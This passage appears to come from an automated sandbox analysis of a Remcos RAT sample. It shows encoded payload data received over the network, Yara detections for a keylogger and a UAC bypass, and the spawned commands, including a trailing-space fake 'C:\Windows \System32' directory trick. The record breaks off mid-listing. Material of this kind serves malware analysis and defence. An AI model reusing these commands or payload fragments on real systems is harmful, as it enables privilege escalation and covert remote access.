2023-08-23 17:31:32 UTC	2808	IN	Data Raw: 76 38 38 76 4c 79 61 58 65 79 4e 77 4d 70 5a 56 72 79 61 58 38 48 63 66 48 77 38 57 6b 42 5a 62 54 64 2b 57 6c 2f 39 33 54 78 38 50 46 74 65 32 56 46 59 57 6c 37 62 55 56 5a 61 58 74 6c 52 56 47 73 2f 2f 4c 79 38 6d 6c 2f 5a 55 55 37 62 58 2f 33 6a 50 48 77 38 57 55 42 71 62 78 71 66 62 79 73 54 50 4c 79 38 6d 6d 35 5a 55 56 4a 39 76 4c 79 38 6d 6c 37 5a 55 55 53 38 51 64 38 76 50 4c 79 61 58 57 32 47 37 57 2b 76 72 36 2b 76 72 36 2b 76 72 36 2b 76 72 36 2b 76 72 36 2b 76 72 36 2b 76 72 35 70 64 64 35 5a 62 58 32 30 64 65 76 7a 4f 45 6c 70 66 66 38 34 6e 50 4c 79 61 58 2f 33 4d 5a 7a 79 38 6d 6c 63 75 67 46 32 6a 50 4c 79 38 75 68 69 44 76 4d 42 64 6f 4c 79 38 76 4b 73 2f 50 4c 79 38 74 31 70 64 65 76 30 4f 42 4a 70 66 66 39 70 6e 50 4c 79 61 58 2f 33 59 Data Ascii: v88vLyaXeyNwMpZVryaX8HcfHw8WkBZbTd+Wl/93Tx8PFte2VFYWl7bUVZaXtlRVGs//Ly8ml/ZUU7bX/3jPHw8WUBqbxqfbysTPLy8mm5ZUVJ9vLy8ml7ZUUS8Qd8vPLyaXW2G7W+vr6+vr6+vr6+vr6+vr6+vr6+vr5pdd5ZbX20devzOElpff84nPLyaX/3MZzy8mlcugF2jPLy8uhiDvMBdoLy8vKs/PLy8t1pdev0OBJpff9pnPLyaX/3Y
2023-08-23 17:31:32 UTC	2824	IN	Data Raw: 73 31 38 66 48 78 76 72 36 2b 76 72 36 2b 76 6d 6c 39 74 6d 6c 37 47 2f 70 70 65 7a 4d 43 61 58 73 37 43 68 68 69 47 57 49 61 61 58 2b 61 47 2f 48 78 38 57 6c 7a 33 6f 4c 7a 38 76 4a 70 66 66 65 78 50 66 4c 79 61 56 53 32 61 58 74 33 63 76 4c 79 38 6d 6c 39 70 38 72 79 38 76 4a 74 66 61 66 53 38 76 4c 79 56 4d 31 69 66 65 70 36 48 30 56 69 65 68 39 46 59 58 6f 66 52 57 4e 61 45 41 46 32 6b 50 54 79 38 6c 71 50 77 76 4c 79 38 67 46 32 68 50 54 79 38 6e 65 37 4f 50 70 33 78 41 46 32 65 50 54 79 38 6d 4b 78 38 2f 4c 79 38 6d 5a 63 77 51 46 32 4f 50 54 79 38 6d 6c 2f 46 30 56 6c 61 58 39 74 52 57 4c 78 42 31 69 52 38 76 4a 61 48 30 56 6c 4f 45 39 70 66 2f 64 54 77 2f 44 78 59 71 72 58 38 76 4b 79 61 58 74 6c 52 56 46 70 66 2f 66 53 79 76 44 78 59 6e 33 4b 61 Data Ascii: s18fHxvr6+vr6+vml9tml7G/ppezMCaXs7ChhiGWIaaX+aG/Hx8Wlz3oLz8vJpffexPfLyaVS2aXt3cvLy8ml9p8ry8vJtfafS8vLyVM1ifep6H0Vieh9FYXofRWNaEAF2kPTy8lqPwvLy8gF2hPTy8ne7OPp3xAF2ePTy8mKx8/Ly8mZcwQF2OPTy8ml/F0VlaX9tRWLxB1iR8vJaH0VlOE9pf/dTw/DxYqrX8vKyaXtlRVFpf/fSyvDxYn3Ka
2023-08-23 17:31:32 UTC	2840	IN	Data Raw: 55 53 43 66 4c 79 38 6d 4a 39 79 6d 4a 2f 62 55 58 7a 32 7a 44 7a 38 76 4a 39 51 42 4e 33 38 54 6a 35 56 4d 33 62 4e 66 50 79 38 6e 39 6f 38 57 6c 2f 56 6a 53 61 38 50 47 72 42 66 4c 79 38 6c 35 31 53 50 76 79 41 58 6c 30 38 76 4c 79 5a 6e 65 37 4e 2f 64 69 58 4f 73 32 78 79 6c 37 62 74 70 74 66 32 62 53 61 58 32 38 75 57 62 53 2b 66 4c 79 38 6e 74 41 34 74 6f 30 37 66 48 78 66 63 70 33 73 6a 63 51 61 58 39 65 4d 35 50 77 38 57 56 39 73 6d 6c 37 50 30 56 52 61 58 73 33 52 55 6d 35 5a 55 55 53 57 66 4c 79 38 74 30 6d 73 50 50 79 38 76 4a 39 77 57 56 39 32 4e 72 59 37 76 48 78 66 63 70 33 73 6a 64 30 61 58 39 65 58 70 50 77 38 57 6c 2f 39 34 43 6f 38 50 46 6c 66 62 56 70 65 7a 39 46 55 57 6c 37 5a 55 56 4a 75 57 56 46 45 6c 33 79 38 76 4c 64 54 32 6c 2f 58 Data Ascii: USCfLy8mJ9ymJ/bUXz2zDz8vJ9QBN38Tj5VM3bNfPy8n9o8Wl/VjSa8PGrBfLy8l51SPvyAXl08vLyZne7N/diXOs2xyl7btptf2bSaX28uWbS+fLy8ntA4to07fHxfcp3sjcQaX9eM5Pw8WV9sml7P0VRaXs3RUm5ZUUSWfLy8t0msPPy8vJ9wWV92NrY7vHxfcp3sjd0aX9eXpPw8Wl/94Co8PFlfbVpez9FUWl7ZUVJuWVFEl3y8vLdT2l/X
2023-08-23 17:31:32 UTC	2856	IN	Data Raw: 6d 79 39 7a 50 32 49 2f 56 52 39 42 50 79 38 6d 32 54 38 2f 4a 36 38 76 4c 79 38 78 48 38 38 68 46 56 43 50 49 52 70 41 72 69 43 4e 49 47 77 67 53 79 41 6a 4d 42 49 77 41 54 43 30 7a 33 38 67 76 7a 65 50 49 45 4d 77 4d 6a 41 6c 48 79 38 6d 32 54 38 2f 49 53 39 76 4c 79 38 77 58 36 38 67 55 58 41 50 49 46 56 66 37 79 42 54 55 42 30 76 38 7a 2f 69 50 7a 44 76 37 79 44 69 63 44 38 67 34 58 41 76 49 4f 56 51 48 79 44 6a 55 4b 34 67 6a 53 42 73 49 45 73 67 49 7a 38 78 44 38 38 68 41 33 43 66 49 51 4a 77 6a 79 45 46 55 47 38 68 44 6b 42 75 49 45 30 67 49 54 38 2f 7a 32 38 76 78 56 41 50 4c 38 70 50 67 7a 38 2f 6a 30 38 76 67 31 39 46 45 4c 56 50 33 79 51 7a 64 5a 38 6b 4d 6e 57 50 4a 44 56 56 66 79 51 2f 4e 54 38 67 62 69 42 4e 49 43 45 2f 4c 79 62 5a 50 7a 38 Data Ascii: my9zP2I/VR9BPy8m2T8/J68vLy8xH88hFVCPIRpAriCNIGwgSyAjMBIwATC0z38gvzePIEMwMjAlHy8m2T8/IS9vLy8wX68gUXAPIFVf7yBTUB0v8z/iPzDv7yDicD8g4XAvIOVQHyDjUK4gjSBsIEsgIz8xD88hA3CfIQJwjyEFUG8hDkBuIE0gIT8/z28vxVAPL8pPgz8/j08vg19FELVP3yQzdZ8kMnWPJDVVfyQ/NT8gbiBNICE/LybZPz8
2023-08-23 17:31:32 UTC	2872	IN	Data Raw: 72 79 55 66 4a 56 38 6d 50 79 55 66 4c 79 38 6d 33 79 43 50 4c 7a 38 6d 54 79 4d 76 49 77 38 6a 50 79 4a 50 49 78 38 6a 7a 79 62 2f 49 6b 38 6a 44 79 4b 50 4c 79 38 76 4c 79 62 76 49 73 38 69 62 79 4e 66 49 79 38 6a 62 79 4d 76 49 70 38 6a 66 79 45 76 4a 6b 38 6a 4c 79 4e 66 49 7a 38 6a 4c 79 4e 66 49 6b 38 6a 66 79 4c 50 49 79 38 6a 48 79 38 76 49 6a 38 67 37 79 38 2f 4a 6e 38 69 7a 79 4c 2f 49 6f 38 6d 58 79 4b 50 49 32 38 69 62 79 4e 66 49 73 38 6a 50 79 4e 2f 49 73 38 6a 4c 79 4d 66 4c 79 38 76 4c 79 5a 76 49 37 38 69 62 79 4b 2f 49 6b 38 6a 48 79 4b 76 49 6f 38 68 4c 79 59 76 49 6d 38 6a 66 79 4c 50 49 35 38 69 6a 79 46 76 49 38 38 6a 48 79 4a 76 49 53 38 6d 72 79 4d 66 49 35 38 6a 4c 79 4c 76 49 6f 38 6a 58 79 38 76 49 7a 38 6b 6e 79 38 2f 4a 6e 38 Data Ascii: ryUfJV8mPyUfLy8m3yCPLz8mTyMvIw8jPyJPIx8jzyb/Ik8jDyKPLy8vLybvIs8ibyNfIy8jbyMvIp8jfyEvJk8jLyNfIz8jLyNfIk8jfyLPIy8jHy8vIj8g7y8/Jn8izyL/Io8mXyKPI28ibyNfIs8jPyN/Is8jLyMfLy8vLyZvI78ibyK/Ik8jHyKvIo8hLyYvIm8jfyLPI58ijyFvI88jHyJvIS8mryMfI58jLyLvIo8jXy8vIz8kny8/Jn8
2023-08-23 17:31:32 UTC	2888	IN	Data Raw: 2f 54 53 39 41 43 77 30 37 73 6e 48 70 61 6c 6d 5a 55 4f 36 6e 65 58 54 6f 35 55 74 55 54 68 38 45 51 68 66 6a 36 50 53 39 75 6c 6f 32 52 52 39 64 32 73 65 32 51 55 6b 39 4c 30 6f 32 41 53 42 41 63 67 76 7a 64 50 4f 4a 7a 68 53 71 53 63 71 41 42 35 33 55 61 53 77 79 6a 48 6c 4a 6e 59 2f 41 72 46 58 49 53 57 61 6f 57 46 57 61 39 63 44 61 51 70 57 70 52 48 71 4c 41 4d 6d 43 56 33 46 6f 78 65 2b 4d 59 65 78 4a 4e 46 41 55 53 4c 58 55 72 42 32 4f 51 75 33 65 4c 6a 73 43 42 64 61 59 79 69 4d 2f 2b 6c 56 33 68 42 58 6e 2b 51 59 78 2f 31 41 67 38 39 50 58 7a 38 76 4f 56 64 50 4d 4e 55 58 54 7a 43 56 45 50 2b 50 55 59 44 77 44 32 43 50 59 47 54 4a 66 62 41 68 62 43 42 4f 55 4c 44 57 46 4e 2f 47 34 4a 76 72 5a 6d 75 30 39 52 45 66 6a 31 47 41 39 45 39 67 70 52 43 Data Ascii: /TS9ACw07snHpalmZUO6neXTo5UtUTh8EQhfj6PS9ulo2RR9d2se2QUk9L0o2ASBAcgvzdPOJzhSqScqAB53UaSwyjHlJnY/ArFXISWaoWFWa9cDaQpWpRHqLAMmCV3Foxe+MYexJNFAUSLXUrB2OQu3eLjsCBdaYyiM/+lV3hBXn+QYx/1Ag89PXz8vOVdPMNUXTzCVEP+PUYDwD2CPYGTJfbAhbCBOULDWFN/G4JvrZmu09REfj1GA9E9gpRC
2023-08-23 17:31:32 UTC	2904	IN	Data Raw: 68 6b 5a 46 73 53 53 57 68 76 47 45 6f 53 56 55 39 61 54 31 50 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 61 47 52 6b 57 78 4a 4a 61 47 38 59 53 68 4a 56 54 31 70 50 55 2f 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 Data Ascii: hkZFsSSWhvGEoSVU9aT1Py8vLy8vLy8vLy8vLy8vLyaGRkWxJJaG8YShJVT1pPU/Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8
2023-08-23 17:31:32 UTC	2920	IN	Data Raw: 4b 35 42 76 4c 79 53 50 4d 56 39 44 6e 79 53 50 4d 55 38 31 46 49 38 78 76 30 50 2f 4c 79 53 63 49 46 58 53 54 79 38 76 4c 79 72 67 6e 79 38 6b 6a 7a 46 66 51 35 38 6b 6a 7a 46 50 4e 54 53 50 4d 62 39 44 2f 79 38 76 4a 63 5a 53 38 76 62 69 51 73 4d 57 51 56 46 78 59 33 4a 44 55 33 4f 44 50 79 38 35 50 73 39 76 4c 79 30 67 56 64 4a 50 4c 79 38 76 4a 77 38 76 4c 79 38 76 4c 79 38 76 4f 4f 6d 77 66 79 38 6b 74 46 38 76 4c 79 38 35 4f 4e 39 2f 4c 79 4d 66 72 79 38 6b 74 51 38 76 4c 79 38 35 4e 43 39 2f 4c 79 77 50 72 79 38 6b 74 5a 38 76 4c 79 38 35 4e 59 39 2f 4c 79 54 2f 76 79 38 6c 33 78 42 56 30 6b 38 76 4c 79 38 73 45 45 38 76 49 74 42 2f 4c 79 53 50 4d 56 39 65 58 7a 46 55 6a 7a 46 50 58 6c 38 78 52 49 38 78 76 31 35 66 4d 62 38 6c 4d 46 42 6c 30 6b 38 Data Ascii: K5BvLySPMV9DnySPMU81FI8xv0P/LyScIFXSTy8vLyrgny8kjzFfQ58kjzFPNTSPMb9D/y8vJcZS8vbiQsMWQVFxY3JDU3ODPy85Ps9vLy0gVdJPLy8vJw8vLy8vLy8vOOmwfy8ktF8vLy85ON9/LyMfry8ktQ8vLy85NC9/LywPry8ktZ8vLy85NY9/LyT/vy8l3xBV0k8vLy8sEE8vItB/LySPMV9eXzFUjzFPXl8xRI8xv15fMb8lMFBl0k8
2023-08-23 17:31:32 UTC	2936	IN	Data Raw: 59 6f 4d 7a 63 73 4d 6a 46 6e 4c 79 51 71 4e 76 4c 30 68 66 73 4f 39 2f 4c 79 39 76 74 37 38 76 4c 79 39 49 62 37 49 76 50 79 38 76 72 36 5a 6a 73 6d 4b 44 4d 33 4c 44 49 78 59 69 63 6e 4e 53 67 32 4e 76 4c 30 68 2f 75 42 39 2f 4c 79 41 76 70 76 4f 44 41 6c 4b 44 55 54 4a 44 55 6b 4d 43 67 33 4b 44 55 32 38 76 53 49 2b 77 37 33 38 76 49 4b 2b 6d 59 37 4a 69 67 7a 4e 79 77 79 4d 57 6f 78 4b 54 49 31 4d 43 51 33 4c 44 49 78 38 76 53 4a 2b 36 6e 37 38 76 49 53 38 76 7a 36 39 76 6f 4a 39 50 4c 79 2f 53 4a 6b 63 47 38 58 5a 68 73 58 38 73 4c 32 39 48 50 34 39 76 66 79 38 76 6f 54 55 6d 6b 79 4d 43 6a 79 39 48 54 34 63 76 66 79 38 76 4c 36 45 31 4e 70 4d 6a 41 6f 38 76 52 31 2b 48 4c 33 38 76 4c 36 2b 68 4e 55 61 54 49 77 4b 50 4c 30 64 76 68 79 39 2f 4c 79 41 Data Ascii: YoMzcsMjFnLyQqNvL0hfsO9/Ly9vt78vLy9Ib7IvPy8vr6ZjsmKDM3LDIxYicnNSg2NvL0h/uB9/LyAvpvODAlKDUTJDUkMCg3KDU28vSI+w738vIK+mY7JigzNywyMWoxKTI1MCQ3LDIx8vSJ+6n78vIS8vz69voJ9PLy/SJkcG8XZhsX8sL29HP49vfy8voTUmkyMCjy9HT4cvfy8vL6E1NpMjAo8vR1+HL38vL6+hNUaTIwKPL0dvhy9/LyA
2023-08-23 17:31:32 UTC	2952	IN	Data Raw: 41 77 4c 44 66 79 39 36 45 49 35 76 50 79 38 68 50 38 46 69 77 39 4b 48 41 70 61 53 67 6b 4d 78 55 6f 4e 69 67 31 4f 53 6a 79 39 36 49 49 35 76 50 79 38 68 76 38 46 69 77 39 4b 48 41 70 61 53 67 6b 4d 32 51 79 4d 44 41 73 4e 2f 4c 33 6f 77 6a 6d 38 2f 4c 79 49 2f 78 74 4d 69 51 6e 4b 44 56 6e 4c 79 51 71 4e 76 4c 33 70 41 67 31 38 2f 4c 79 4b 2f 78 76 4f 44 41 6c 4b 44 56 77 4b 52 55 35 4a 47 49 78 4a 78 59 73 50 53 67 32 38 76 65 6c 43 44 58 7a 38 76 49 76 2f 47 55 6b 4e 79 52 6c 4c 44 55 6f 4a 6a 63 79 4e 54 7a 79 39 36 59 49 2b 50 66 79 38 6a 50 79 2b 47 70 75 59 6d 68 6d 49 6e 41 54 46 32 70 77 62 32 4a 74 49 6d 6c 6d 59 6d 56 6d 46 56 64 56 38 76 65 6e 43 41 6a 33 38 76 4c 34 45 32 70 75 59 6d 68 6d 49 6e 41 54 46 32 70 77 62 32 4a 74 49 6d 6c 6d 59 Data Ascii: AwLDfy96EI5vPy8hP8Fiw9KHApaSgkMxUoNig1OSjy96II5vPy8hv8Fiw9KHApaSgkM2QyMDAsN/L3owjm8/LyI/xtMiQnKDVnLyQqNvL3pAg18/LyK/xvODAlKDVwKRU5JGIxJxYsPSg28velCDXz8vIv/GUkNyRlLDUoJjcyNTzy96YI+Pfy8jPy+GpuYmhmInATF2pwb2JtImlmYmVmFVdV8venCAj38vL4E2puYmhmInATF2pwb2JtImlmY
2023-08-23 17:31:32 UTC	2968	IN	Data Raw: 48 79 2f 66 31 71 42 66 4c 79 39 67 58 7a 39 66 72 39 2f 56 76 39 58 50 66 7a 42 66 4c 79 39 2f 2f 79 39 66 70 62 2f 56 7a 33 61 67 56 5a 2f 66 4c 79 2b 50 2f 79 39 51 42 62 2f 56 7a 33 61 67 56 5a 2f 66 4c 79 2b 51 48 79 2f 66 33 79 38 76 6f 46 38 2f 58 36 2f 66 64 62 2f 56 7a 33 38 77 58 79 38 76 76 2f 38 6d 6f 46 57 66 66 79 38 76 7a 2f 38 76 58 36 57 2f 31 63 39 32 6f 46 57 66 66 79 38 76 30 49 38 76 58 36 57 2f 31 63 2f 57 6f 46 38 76 4c 2b 43 50 4c 31 2b 6c 76 39 58 50 64 71 42 66 4c 79 2f 77 58 7a 2f 66 31 62 2f 56 7a 33 38 77 58 79 38 67 41 4a 38 2f 58 36 2f 66 31 62 2f 56 7a 33 38 77 58 79 38 67 48 2f 38 6d 6f 46 38 76 49 43 2f 2f 4c 31 2b 6c 76 39 58 50 64 71 42 66 4c 79 41 2f 50 7a 61 67 58 7a 42 66 4c 79 42 45 4c 79 61 67 56 51 2f 66 4c 79 42 Data Ascii: Hy/f1qBfLy9gXz9fr9/Vv9XPfzBfLy9//y9fpb/Vz3agVZ/fLy+P/y9QBb/Vz3agVZ/fLy+QHy/f3y8voF8/X6/fdb/Vz38wXy8vv/8moFWffy8vz/8vX6W/1c92oFWffy8v0I8vX6W/1c/WoF8vL+CPL1+lv9XPdqBfLy/wXz/f1b/Vz38wXy8gAJ8/X6/f1b/Vz38wXy8gH/8moF8vIC//L1+lv9XPdqBfLyA/PzagXzBfLyBELyagVQ/fLyB
2023-08-23 17:31:32 UTC	2984	IN	Data Raw: 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 Data Ascii: Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8
2023-08-23 17:31:32 UTC	3000	IN	Data Raw: 4c 79 39 50 4c 79 38 76 4c 79 38 76 62 79 35 66 4d 55 6b 66 4c 30 38 76 4c 79 38 76 4c 79 2f 76 54 79 38 76 4c 79 38 76 4c 7a 38 68 54 2b 39 50 4c 79 38 76 4c 79 38 67 48 30 38 76 4c 79 38 76 4c 79 39 76 4c 6c 38 78 53 52 41 66 54 79 38 76 4c 79 38 76 49 47 39 50 4c 79 38 76 4c 79 38 76 50 79 46 41 62 30 38 76 4c 79 38 76 4c 79 43 66 54 79 38 76 4c 79 38 76 4c 32 38 75 58 7a 46 4a 45 4a 39 50 4c 79 38 76 4c 79 38 6b 58 30 38 76 4c 79 38 76 4c 79 38 2f 49 55 52 66 54 79 38 76 4c 79 38 76 4a 49 39 50 4c 79 38 76 4c 79 38 76 62 79 35 66 4d 55 6b 66 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4b 43 38 2f 4c 79 38 76 4c 79 38 70 7a 7a 38 76 4c 79 38 76 4c 79 38 2f 49 62 6e 50 50 79 38 76 4c 79 38 76 4b 6d 38 2f 4c 79 38 76 4c 79 38 76 62 79 35 Data Ascii: Ly9PLy8vLy8vby5fMUkfL08vLy8vLy/vTy8vLy8vLz8hT+9PLy8vLy8gH08vLy8vLy9vLl8xSRAfTy8vLy8vIG9PLy8vLy8vPyFAb08vLy8vLyCfTy8vLy8vL28uXzFJEJ9PLy8vLy8kX08vLy8vLy8/IURfTy8vLy8vJI9PLy8vLy8vby5fMUkfLy8vLy8vLy8vLy8vLy8vKC8/Ly8vLy8pzz8vLy8vLy8/IbnPPy8vLy8vKm8/Ly8vLy8vby5
2023-08-23 17:31:32 UTC	3016	IN	Data Raw: 6a 30 38 76 49 72 66 50 4c 79 2f 2f 4c 79 38 76 58 7a 6e 50 4c 79 38 76 62 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 67 54 30 38 76 4a 59 42 2f 4c 79 41 50 4c 79 38 76 58 7a 42 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 6d 6e 30 38 76 4a 34 42 50 4c 79 41 66 4c 79 38 76 58 7a 50 76 4c 79 38 76 50 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 54 7a 63 6f 4f 7a 66 79 38 76 49 53 43 76 4c 79 38 2f 4c 79 38 76 58 7a 55 2f 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 54 79 63 6b 4e 79 54 79 38 76 4a 52 38 76 4c 79 39 50 4c 79 38 76 58 7a 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 54 79 55 32 4e 76 4c 79 38 76 4a 68 2b 2f 4c 79 2b 50 4c 79 38 Data Ascii: j08vIrfPLy//Ly8vXznPLy8vby8vLy8vLy8vLy8vLy8vLy8gT08vJYB/LyAPLy8vXzBvLy8vLy8vLy8vLy8vLy8vLy8vLy8mn08vJ4BPLyAfLy8vXzPvLy8vPy8vLy8vLy8vLy8vLyTzcoOzfy8vISCvLy8/Ly8vXzU/Ly8vLy8vLy8vLy8vLy8vLyTyckNyTy8vJR8vLy9PLy8vXz8vLy8vLy8vLy8vLy8vLy8vLyTyU2NvLy8vJh+/Ly+PLy8
2023-08-23 17:31:32 UTC	3032	IN	Data Raw: 38 6d 38 69 49 69 4d 43 77 78 4b 6a 6f 33 4b 7a 55 69 4e 54 67 78 49 69 34 6f 50 43 49 6e 4e 7a 49 31 4e 6b 38 7a 4a 44 55 33 54 31 48 79 49 69 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 6d 4e 76 49 75 4b 44 77 69 4a 7a 63 79 4e 53 49 76 4c 44 59 33 38 69 49 69 49 6a 70 58 56 53 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 6b 4a 79 63 69 4c 69 67 38 49 69 63 33 4d 6a 58 79 49 69 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 6d 4e 69 49 73 4d 53 77 33 38 69 49 69 49 6a 70 58 56 53 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 31 4b 44 41 79 4f 53 67 69 4c 69 67 38 49 69 63 33 4d 6a 58 79 49 69 49 77 4c 44 45 71 4f 69 49 58 62 52 59 6d 4a 43 38 76 4a 53 51 6d 4c 76 4a 6c 4c 79 39 6d 4d 54 63 31 50 42 4d 79 4c 44 45 33 38 69 49 69 49 68 55 59 62 78 64 71 62 6d 59 69 45 78 5a 6d 47 Data Ascii: 8m8iIiMCwxKjo3KzUiNTgxIi4oPCInNzI1Nk8zJDU3T1HyIiIwLDEqOjcrNSImNvIuKDwiJzcyNSIvLDY38iIiIjpXVSIwLDEqOjcrNSIkJyciLig8Iic3MjXyIiIwLDEqOjcrNSImNiIsMSw38iIiIjpXVSIwLDEqOjcrNSI1KDAyOSgiLig8Iic3MjXyIiIwLDEqOiIXbRYmJC8vJSQmLvJlLy9mMTc1PBMyLDE38iIiIhUYbxdqbmYiExZmG

Target ID:	0
Start time:	19:30:02
Start date:	23/08/2023
Path:	C:\Users\user\Desktop\0vJrK0NCd1.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\0vJrK0NCd1.exe
Imagebase:	0x400000
File size:	1'131'463 bytes
MD5 hash:	533B3DF0E597C50E1129EC807FD6BBCF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	19:30:41
Start date:	23/08/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ElpuxpkiO.bat" "
Imagebase:	0x50000
File size:	232'960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	19:30:41
Start date:	23/08/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff766460000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	19:30:41
Start date:	23/08/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c mkdir "\\?\C:\Windows "
Imagebase:	0x50000
File size:	232'960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	19:30:41
Start date:	23/08/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c mkdir "\\?\C:\Windows \System32"
Imagebase:	0x50000
File size:	232'960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	19:30:41
Start date:	23/08/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c ECHO F
Imagebase:	0x50000
File size:	232'960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	19:30:41
Start date:	23/08/2023
Path:	C:\Windows\SysWOW64\xcopy.exe
Wow64 process (32bit):	true
